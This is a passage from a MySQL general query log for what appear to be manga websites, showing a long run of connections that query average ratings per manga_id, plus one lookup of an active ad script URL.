FROM ratings where manga_id = '298' order by created desc 330639601 Quit 330639602 Quit 330639603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330639604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330639603 Quit 330639604 Quit 330639605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330639605 Quit 330639606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330639607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639606 Quit 330639607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330639607 Quit 330639608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330639609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330639608 Quit 330639609 Quit 330639610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330639611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330639610 Quit 330639611 Quit 330639612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330639612 Quit 330639613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330639614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639613 Quit 330639615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330639615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330639614 Quit 330639615 Quit 330639616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330639617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639616 Quit 330639617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330639617 Quit 330639618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330639619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639618 Quit 330639619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330639619 Quit 330639620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330639621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330639621 Quit 330639620 Quit 330639622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330639623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330639622 Quit 330639623 Quit 330639624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330639625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330639624 Quit 330639625 Quit 330639626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330639626 Quit 330639627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330639628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330639627 Quit 330639628 Quit 330639630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330639629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330639630 Quit 330639629 Quit 330639631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330639632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639631 Quit 330639632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330639633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639632 Quit 330639633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330639633 Quit 330639634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330639634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330639635 Quit 330639634 Quit 330639637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330639637 Quit 330639638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330639636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330639638 Quit 330639636 Quit 330639639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330639640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330639639 Quit 330639640 Quit 330639641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330639641 Quit 330639642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330639643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330639642 Quit 330639643 Quit 330639644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330639645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330639644 Quit 330639645 Quit 330639646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330639647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639646 Quit 330639647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330639647 Quit 330639648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330639649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330639648 Quit 330639650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639649 Quit 330639650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330639650 Quit 330639651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330639652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330639651 Quit 330639652 Quit 330639653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330639653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330639654 Quit 330639653 Quit 330639655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330639656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639655 Quit 330639656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330639656 Quit 330639657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330639658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330639659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639657 Quit 330639658 Quit 330639660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330639659 Quit 330639660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330639660 Quit 330639661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330639662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639661 Quit 330639662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330639663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639662 Quit 330639663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330639664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639663 Quit 330639664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330639664 Quit 330639665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639666 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330639665 Quit 330639666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330639667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639668 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639666 Quit 330639668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330639667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330639668 Quit 330639667 Quit 330639669 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330639669 Quit 330639670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330639670 Quit 330639671 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330639672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330639671 Quit 330639672 Quit 330639673 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330639674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330639673 Quit 330639674 Quit 330639675 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330639675 Quit 330639676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639677 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330639677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330639676 Quit 330639677 Quit 330639678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639679 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330639679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330639678 Quit 330639679 Quit 330639680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330639681 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639680 Quit 330639681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330639682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639681 Quit 330639682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330639683 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639682 Quit 330639683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330639684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639683 Quit 330639684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330639684 Quit 330639685 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330639685 Quit 330639687 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330639687 Quit 330639688 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330639686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330639688 Quit 330639686 Quit 330639689 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330639690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330639689 Quit 330639690 Quit 330639691 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330639692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639691 Quit 330639692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330639692 Quit 330639693 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330639694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330639694 Quit 330639693 Quit 330639695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639696 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330639696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330639695 Quit 330639696 Quit 330639697 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330639697 Quit 330639698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330639699 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639698 Quit 330639700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330639700 Quit 330639701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330639699 Quit 330639701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330639702 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330639702 Quit 330639703 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330639703 Quit 330639701 Quit 330639704 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330639705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639704 Quit 330639705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330639705 Quit 330639706 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330639706 Quit 330639708 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330639707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330639708 Quit 330639707 Quit 330639709 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330639710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330639709 Quit 330639710 Quit 330639711 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330639711 Quit 330639712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330639713 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639712 Quit 330639713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330639713 Quit 330639714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639715 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330639715 Quit 330639714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330639714 Quit 330639716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330639716 Quit 330639717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330639718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639717 Quit 330639718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330639718 Quit 330639719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330639720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330639719 Quit 330639720 Quit 330639721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330639722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639721 Quit 330639722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330639722 Quit 330639723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330639723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330639724 Quit 330639723 Quit 330639725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330639725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330639726 Quit 330639725 Quit 330639727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330639728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330639727 Quit 330639730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330639728 Quit 330639729 Quit 330639730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330639730 Quit 330639731 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330639731 Quit 330639732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639733 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330639733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330639732 Quit 330639733 Quit 330639734 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330639735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639734 Quit 330639735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330639735 Quit 330639737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330639737 Quit 330639736 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330639738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639736 Quit 330639738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330639738 Quit 330639739 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330639740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330639740 Quit 330639739 Quit 330639741 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330639741 Quit 330639742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330639742 Quit 330639743 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330639743 Quit 330639744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330639744 Quit 330639745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330639745 Quit 330639746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330639746 Quit 330639747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330639748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639747 Quit 330639748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330639749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639748 Quit 330639749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330639749 Quit 330639750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330639751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330639751 Quit 330639750 Quit 330639753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330639754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639752 Quit 330639753 Quit 330639754 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639754 Quit 330639755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM 